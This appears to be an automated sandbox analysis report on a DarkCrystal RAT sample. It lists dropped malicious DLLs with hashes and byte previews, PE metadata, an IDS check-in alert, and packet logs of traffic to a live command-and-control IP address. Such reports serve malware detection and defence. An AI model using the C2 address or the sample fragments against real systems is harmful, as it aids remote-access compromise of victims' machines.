                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....

                                                      C:\Users\user\Desktop\wdeWzfMx.log

                                                      Download File
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):126976
                                                      Entropy (8bit):6.057993947082715
                                                      Encrypted:false
                                                      SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                      MD5:16B480082780CC1D8C23FB05468F64E7
                                                      SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                      SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                      SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 21%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                      C:\Users\user\Desktop\xQsMWHQg.log

                                                      Download File
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):39936
                                                      Entropy (8bit):5.660491370279985
                                                      Encrypted:false
                                                      SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                      MD5:240E98D38E0B679F055470167D247022
                                                      SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                      SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                      SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\ySVMqwBm.log

                                                      Download File
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):40448
                                                      Entropy (8bit):5.7028690200758465
                                                      Encrypted:false
                                                      SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                      MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                      SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                      SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                      SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 12%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\zJHvHEBf.log

                                                      Download File
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):38400
                                                      Entropy (8bit):5.699005826018714
                                                      Encrypted:false
                                                      SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                      MD5:87765D141228784AE91334BAE25AD743
                                                      SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                      SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                      SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 25%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      \Device\Null

                                                      Download File
                                                      Process:C:\Windows\System32\PING.EXE
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):502
                                                      Entropy (8bit):4.608377343060015
                                                      Encrypted:false
                                                      SSDEEP:12:PK5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:8dUOAokItULVDv
                                                      MD5:F228289A53C244D8996584A6EEF803E5
                                                      SHA1:1F26F0AC9A91F14FC7977292C1DC964B31DFB7B7
                                                      SHA-256:D0E6141299C5B2C923C333EC39791BC7B57BE52629E8944D2A8AAD583B7FAF5E
                                                      SHA-512:C3CAF389D84A488D070122C782DA8469CBCDB5D5FDAFCAF82DE6AC3121D437D1AE70FA29A3EE4D648146119B0E07832713AF18AA63FEA2A4B95985A8B5824DF8
                                                      Malicious:false
                                                      Preview:..Pinging 414408 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):4.629619443814358
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Windows Screen Saver (13104/52) 0.07%
                                                      • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                      File name:CPNSQusnwC.exe
                                                      File size:2'670'080 bytes
                                                      MD5:a26ed7dc21bc77f20c0251fa25738d02
                                                      SHA1:8fc82929941d67a20c76976e796feab701795c2f
                                                      SHA256:18e83d9fabe142a751c644f12d223e6c4825912573a352551361abde977d753f
                                                      SHA512:5e8044fd8e78aad306d8ffd3b3bbc6583cc353c8cddda1a15b05a22fcf7815a770482418bdb120c679f784017741e36c87aa5bb053008cc94fe9560b97366838
                                                      SSDEEP:24576:eRDNakc4BcCw7sUL/4cIG5IuUe1QdcqTHmdbBs3eJCZrCsjOEKka+wlFlett6t1:yDNu4BaMcQmQmqyHM6sslnE
                                                      TLSH:F8C57D3439EB502AB173EFB58AE4749ADA6FF6B33B07585E205103864713A81DDC163E
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..........".......(...........(.. ....(...@.. ....................... ).....>J)...@................................

                                                      File Icon

                                                      Icon Hash:00928e8e8686b000

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x68d48e
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x6507AC75 [Mon Sep 18 01:48:37 2023 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                      Entrypoint Preview

                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x28d43c0x4f.text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x28e0000x370.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x2900000xc.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x20000x28b4940x28b600ff35990863e41a2468c3f34f3efc3ae1unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rsrc0x28e0000x3700x4002ffb75f85312317934221c41dbe5a9afFalse0.37890625data2.865400005536527IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0x2900000xc0x200e29151928ba60d3dd3e3d251c127866bFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_VERSION0x28e0580x318data0.44823232323232326

                                                      Imports

                                                      DLLImport
                                                      mscoree.dll_CorExeMain

                                                      Network Behavior

                                                      Suricata IDS Alerts

                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                      2024-12-13T14:32:37.532082+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.64975345.88.91.8980TCP

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Dec 13, 2024 14:32:36.267719030 CET4975380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:36.387552977 CET804975345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:36.387650013 CET4975380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:36.388613939 CET4975380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:36.508490086 CET804975345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:36.736071110 CET4975380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:36.855916023 CET804975345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:37.474585056 CET804975345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:37.532082081 CET4975380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:37.644917011 CET804975345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:37.644941092 CET804975345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:37.645004034 CET4975380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:38.491646051 CET4975380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:38.611515045 CET804975345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:38.806109905 CET804975345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:38.806293011 CET4975380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:38.828486919 CET4975880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:38.926553011 CET804975345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:38.948699951 CET804975845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:38.950028896 CET4975880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:38.950464010 CET4975880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:39.070370913 CET804975845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:39.132133007 CET804975345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:39.165730953 CET4975380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:39.285757065 CET804975345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:39.297720909 CET4975880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:39.417635918 CET804975845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:39.417653084 CET804975845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:39.417663097 CET804975845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:39.480303049 CET804975345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:39.480789900 CET4975380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:39.600663900 CET804975345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:39.600712061 CET804975345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:39.851896048 CET804975345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:40.016340971 CET4975380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:40.046741009 CET804975845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:40.125696898 CET4975880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:40.301660061 CET804975845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:40.457501888 CET4975880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:40.811963081 CET4975380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:40.812429905 CET4975880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:40.812799931 CET4976380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:40.932569027 CET804976345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:40.932648897 CET4976380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:40.946556091 CET804975345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:40.946571112 CET804975845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:40.946631908 CET4975380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:40.946644068 CET4975880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:41.049606085 CET4976380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:41.250804901 CET4976680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:41.373400927 CET804976645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:41.373521090 CET4976680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:41.386358023 CET4976680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:41.506266117 CET804976645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:41.735192060 CET4976680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:41.855389118 CET804976645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:41.855428934 CET804976645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:41.855480909 CET804976645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:42.459769964 CET804976645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:42.547590971 CET4976680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:42.697562933 CET804976645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:42.844554901 CET4976680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:42.869812012 CET4976680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:42.870109081 CET4977180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:42.990916014 CET804977145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:42.990963936 CET804976645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:42.991009951 CET4977180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:42.991041899 CET4976680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:42.991209030 CET4977180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:43.111207962 CET804977145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:43.344552040 CET4977180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:43.464601994 CET804977145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:43.464617968 CET804977145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:43.464627028 CET804977145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:44.077646017 CET804977145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:44.141408920 CET4977180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:44.321846962 CET804977145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:44.547549009 CET4977180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:44.551179886 CET4977580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:44.671017885 CET804977545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:44.671188116 CET4977580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:44.671328068 CET4977580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:44.791109085 CET804977545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:44.861135006 CET4977880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:44.862914085 CET4977580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:44.980938911 CET804977845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:44.981096029 CET4977880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:44.981887102 CET4977880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:44.995558023 CET4977980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:45.025137901 CET804977545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:45.101744890 CET804977845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:45.115777016 CET804977945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:45.115897894 CET4977980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:45.116075993 CET4977980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:45.235754013 CET804977945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:45.329184055 CET4977880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:45.453571081 CET804977845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:45.453587055 CET804977845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:45.469696045 CET4977980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:45.563479900 CET804977545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:45.563618898 CET4977580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:45.590842009 CET804977945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:45.590853930 CET804977945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:45.591085911 CET804977945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:46.067620039 CET804977845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:46.124214888 CET4977880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:46.235368967 CET804977945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:46.301399946 CET804977845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:46.344449043 CET4977980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:46.422662020 CET4977880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:46.469403028 CET804977945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:46.531969070 CET4977980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:46.599004984 CET4977880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:46.599308014 CET4978380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:46.599365950 CET4977980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:46.719094992 CET804978345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:46.719171047 CET4978380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:46.719294071 CET804977845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:46.719347954 CET4978380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:46.719350100 CET4977880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:46.719767094 CET804977945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:46.719933033 CET4977980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:46.839107037 CET804978345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:47.063344002 CET4978380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:47.183643103 CET804978345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:47.183665991 CET804978345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:47.183706045 CET804978345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:47.806603909 CET804978345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:47.922563076 CET4978380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:48.041188002 CET804978345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:48.168387890 CET4978380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:48.227288961 CET4978780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:48.347330093 CET804978745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:48.350087881 CET4978780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:48.351617098 CET4978780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:48.471535921 CET804978745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:48.703907013 CET4978780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:48.824039936 CET804978745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:48.824064016 CET804978745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:48.824100971 CET804978745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:49.436192036 CET804978745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:49.531940937 CET4978780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:49.669106960 CET804978745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:49.808192968 CET4978780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:49.808619022 CET4979380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:49.928390026 CET804978745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:49.928462029 CET804979345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:49.928474903 CET4978780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:49.928554058 CET4979380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:49.928683043 CET4979380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:50.048319101 CET804979345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:50.282066107 CET4979380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:50.402111053 CET804979345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:50.402126074 CET804979345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:50.402137041 CET804979345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:51.031677008 CET804979345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:51.141447067 CET4979380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:51.278587103 CET804979345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:51.333734989 CET4979580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:51.344541073 CET4979380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:51.453571081 CET804979545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:51.453676939 CET4979580192.168.2.645.88.91.89
